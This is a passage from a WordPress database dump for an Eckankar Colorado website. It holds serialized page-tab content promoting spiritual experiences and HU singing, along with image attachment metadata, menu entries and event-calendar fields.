style=\"padding-left: 15px; max-width: 100%; float: right;\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2015/10/reality-sp-exp-video.png\" /></a></span></strong></p><p>Spiritual experiences are no longer the exclusive domain of religious leaders, saints, and mystics. They are part of everyday living for millions of people.</p><p>Many have questions: <em>Are their experiences real? What do they mean? How can I have more experiences of the Divine?</em> Eckankar offers answers.</p><p>These teachings provide a way for people to explore their own spiritual experiences, which may include out-of-body adventures, near-death experiences, prophetic dreams, dreams with a departed loved one, a sense of having lived before, déjà vu, seeing an inner light, or hearing an inner sound. The personal insights you gain can enrich your daily life, help open your Spiritual Eye, and reveal the love of God in your own heart. <em>Enjoy your journey!</em></p>\";}i:5;a:2:{s:11:\"_rtbs_title\";s:13:\"Experience HU\";s:13:\"_rtbs_content\";s:980:\"<p><span style=\"font-size: 13pt;\"><strong><span style=\"color: #23507d;\">Experience HU —The Sound of Soul<a href=\"http://youtu.be/zvecTKM_-wk\" data-rokbox=\"\"><img style=\"padding-left: 15px; max-width: 100%; float: right;\" src=\"https://www.eckankar-colorado.org/wp-content/uploads/2015/03/miracles_video.jpg\" alt=\"\" /></a></span></strong> </span></p><p>Join us in singing <strong>HU</strong>, a sacred sound that can help you meet life’s challenges. This ancient and once secret name for God has helped people from all backgrounds throughout the ages. Open to the public.</p><p><span style=\"color: #666666;\"> \"When you sing HU, the Holy Spirit begins to work in your life. It begins to change the situation with which you are struggling.\"<br /><em>— </em>Harold Klemp<em>, The Drumbeat of Time, </em>page 119</span></p><p>Check <a href=\"https://www.eckankar-colorado.org/hucolorado-org/\" target=\"_blank\" rel=\"noopener\">HU Colorado</a> for a \"Sound of Soul\" event near you!</p>\";}}'),(6814,81469,'_wc_gallery_custom_image_link',''),(6812,83948,'_wc_gallery_custom_image_link',''),(1258,15203,'_edit_lock','1563138601:1'),(1257,15203,'_edit_last','1'),(6850,88712,'bgseo_robots_follow','follow'),(6849,88712,'bgseo_robots_index','index'),(6848,88712,'boldgrid_in_page_containers','1'),(6847,88712,'boldgrid_hide_page_title','0'),(6845,88712,'_wpac_show_excerpt_in_search','0'),(6846,88712,'_wpac_nonmembers_redirect_to',''),(6843,88712,'_wpac_members_redirect_to',''),(6844,88712,'_wpac_show_in_search','0'),(6840,88712,'_edit_lock','1577402569:2'),(6841,88712,'_edit_last','2'),(6842,88712,'_wp_page_template','default'),(2190,7174,'_wpac_show_excerpt_in_search','0'),(2189,7174,'_wpac_show_in_search','0'),(846,7172,'_wp_page_template','default'),(194032,269259,'mec_location_id','118'),(194031,269259,'mec_color',''),(194030,269258,'_seq_num','95'),(2530,51767,'_tribe_modified_fields','a:20:{s:12:\"_VenueOrigin\";d:1563807994;s:10:\"_edit_last\";d:1563808034;s:10:\"post_title\";d:1563808034;s:11:\"post_status\";d:1563808034;s:17:\"_EventShowMapLink\";d:1563808034;s:13:\"_EventShowMap\";d:1563808034;s:17:\"_VenueShowMapLink\";d:1563808034;s:13:\"_VenueShowMap\";d:1563808034;s:13:\"_VenueAddress\";d:1563808034;s:10:\"_VenueCity\";d:1563808034;s:13:\"_VenueCountry\";d:1563808034;s:14:\"_VenueProvince\";d:1563808034;s:11:\"_VenueState\";d:1563808034;s:9:\"_VenueZip\";d:1563808034;s:11:\"_VenuePhone\";d:1563808034;s:9:\"_VenueURL\";d:1563808034;s:19:\"_VenueStateProvince\";d:1563808034;s:21:\"_VenueOverwriteCoords\";d:1563808034;s:16:\"_VenueGeoAddress\";d:1563808035;s:24:\"boldgrid_hide_page_title\";d:1563808035;}'),(845,7173,'_menu_item_url',''),(844,7173,'_menu_item_xfn',''),(838,7173,'_menu_item_type','post_type'),(2180,45207,'_menu_item_menu_item_parent','0'),(143770,265164,'_field_39','I\'m just giving you my new email address!\n\nNo change in physical address...'),(67126,252359,'_wp_attached_file','2020/01/cosprings-member-cal-promo.jpg'),(67127,252359,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:411;s:6:\"height\";i:231;s:4:\"file\";s:38:\"2020/01/cosprings-member-cal-promo.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"cosprings-member-cal-promo-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"cosprings-member-cal-promo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:36:\"cosprings-member-cal-promo-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:38:\"cosprings-member-cal-promo-300x231.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:38:\"cosprings-member-cal-promo-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:38:\"cosprings-member-cal-promo-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:38:\"cosprings-member-cal-promo-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:38:\"cosprings-member-cal-promo-400x231.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(67128,252360,'_wp_attached_file','2020/01/loveland-member-cal-promo.jpg'),(67129,252360,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:411;s:6:\"height\";i:231;s:4:\"file\";s:37:\"2020/01/loveland-member-cal-promo.jpg\";s:5:\"sizes\";a:8:{s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"loveland-member-cal-promo-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"loveland-member-cal-promo-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:35:\"loveland-member-cal-promo-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:37:\"loveland-member-cal-promo-300x231.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:37:\"loveland-member-cal-promo-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:37:\"loveland-member-cal-promo-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:37:\"loveland-member-cal-promo-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:37:\"loveland-member-cal-promo-400x231.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:231;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(67130,252359,'_edit_lock','1579198169:2'),(67154,252360,'_edit_lock','1579198464:2'),(143860,265160,'smush-info','The file was compressed from 91.61 KB to 86.96 KB saving 5.08 percent using WP-Optimize'),(143859,265160,'smush-complete','1'),(8331,109539,'_nav_menu_role','in'),(8279,109539,'_menu_item_url',''),(10576,123036,'_wp_attached_file','2019/08/spex-accord-2.jpg'),(10577,123036,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:178;s:6:\"height\";i:241;s:4:\"file\";s:25:\"2019/08/spex-accord-2.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"spex-accord-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:23:\"spex-accord-2-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:25:\"spex-accord-2-133x180.jpg\";s:5:\"width\";i:133;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:25:\"spex-accord-2-178x150.jpg\";s:5:\"width\";i:178;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(5683,55589,'_menu_item_xfn',''),(143884,265198,'protect_children',''),(2529,51767,'_VenueOrigin','events-calendar'),(2179,45207,'_menu_item_type','post_type'),(2188,7174,'_wpac_members_redirect_to',''),(143769,265164,'_field_37','US'),(143766,265164,'_field_34',''),(143767,265164,'_field_35',''),(143768,265164,'_field_36','Please Choose Your State'),(5678,55589,'_menu_item_menu_item_parent','0'),(5684,55589,'_menu_item_url','#'),(195883,269412,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-12-10\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-12-10\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(195882,269412,'mec_additional_location_ids','a:0:{}'),(195881,269412,'mec_additional_organizer_ids','a:0:{}'),(68195,253423,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1600;s:6:\"height\";i:900;s:4:\"file\";s:33:\"2020/01/westslope-bkgnd-image.jpg\";s:5:\"sizes\";a:17:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"westslope-bkgnd-image-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:34:\"westslope-bkgnd-image-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:31:\"westslope-bkgnd-image-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-250x141.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:141;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-550x309.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:309;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"wcbig\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-800x450.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:450;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-320x180.jpg\";s:5:\"width\";i:320;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-533x300.jpg\";s:5:\"width\";i:533;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:13:\"wcfixedheight\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-889x500.jpg\";s:5:\"width\";i:889;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:33:\"westslope-bkgnd-image-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcslider\";a:4:{s:4:\"file\";s:34:\"westslope-bkgnd-image-1100x500.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(68194,253423,'_wp_attached_file','2020/01/westslope-bkgnd-image.jpg'),(195880,269412,'mec_currency','a:0:{}'),(195879,269412,'mec_cost',''),(195878,269412,'mec_more_info_target','_self'),(195877,269412,'mec_more_info_title',''),(195876,269412,'mec_more_info',''),(195875,269412,'mec_read_more',''),(195874,269412,'mec_organizer_id','1'),(195873,269412,'mec_dont_show_map','0'),(10872,125653,'cropPositionNeedUpdate','a:3:{i:0;b:0;i:1;s:3:\"215\";i:2;s:3:\"215\";}'),(10852,125668,'_wp_attached_file','2019/08/ECK_Temple_CO_019-lg.jpg'),(10853,125668,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:348;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_019-lg.jpg\";s:5:\"sizes\";a:10:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_019-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_019-lg-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_019-lg-348x250.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_019-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_019-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_019-lg-250x333.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:333;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_019-lg-135x180.jpg\";s:5:\"width\";i:135;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_019-lg-225x300.jpg\";s:5:\"width\";i:225;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_019-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_019-lg-348x285.jpg\";s:5:\"width\";i:348;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.4\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:9:\"iPhone 4S\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1447076342\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.28\";s:3:\"iso\";s:2:\"80\";s:13:\"shutter_speed\";s:4:\"0.05\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(1057,7160,'_edit_lock','1700584712:2'),(1064,7160,'_edit_last','2'),(1065,7160,'boldgrid_hide_page_title','0'),(1066,7160,'bgseo_robots_index','index'),(1067,7160,'bgseo_robots_follow','follow'),(10854,125669,'_wp_attached_file','2019/08/ECK_Temple_CO_020-lg.jpg'),(10855,125669,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_020-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_020-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_020-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_020-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_020-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_020-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_020-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_020-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_020-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_020-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_020-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_020-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 6\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442752059\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:4:\"4.15\";s:3:\"iso\";s:2:\"40\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10826,125655,'_wp_attached_file','2019/08/ECK_Temple_CO_005-lg.jpg'),(10827,125655,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:698;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_005-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_005-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_005-lg-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_005-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_005-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_005-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_005-lg-250x166.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:166;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_005-lg-550x365.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:365;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_005-lg-271x180.jpg\";s:5:\"width\";i:271;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_005-lg-452x300.jpg\";s:5:\"width\";i:452;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_005-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_005-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:2:\"20\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"NEX-5R\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1442685701\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"123\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(10828,125656,'_wp_attached_file','2019/08/ECK_Temple_CO_006-lg.jpg'),(10829,125656,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:618;s:6:\"height\";i:463;s:4:\"file\";s:32:\"2019/08/ECK_Temple_CO_006-lg.jpg\";s:5:\"sizes\";a:11:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_006-lg-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_006-lg-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_006-lg-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"wcicon\";a:4:{s:4:\"file\";s:30:\"ECK_Temple_CO_006-lg-48x48.jpg\";s:5:\"width\";i:48;s:6:\"height\";i:48;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:8:\"wcsquare\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_006-lg-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:7:\"wcsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_006-lg-250x187.jpg\";s:5:\"width\";i:250;s:6:\"height\";i:187;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wcstandard\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_006-lg-550x412.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:412;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"wcfixedheightsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_006-lg-240x180.jpg\";s:5:\"width\";i:240;s:6:\"height\";i:180;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:19:\"wcfixedheightmedium\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_006-lg-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:15:\"wccarouselsmall\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_006-lg-210x150.jpg\";s:5:\"width\";i:210;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:10:\"wccarousel\";a:4:{s:4:\"file\";s:32:\"ECK_Temple_CO_006-lg-400x285.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:285;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:8:\"iPhone 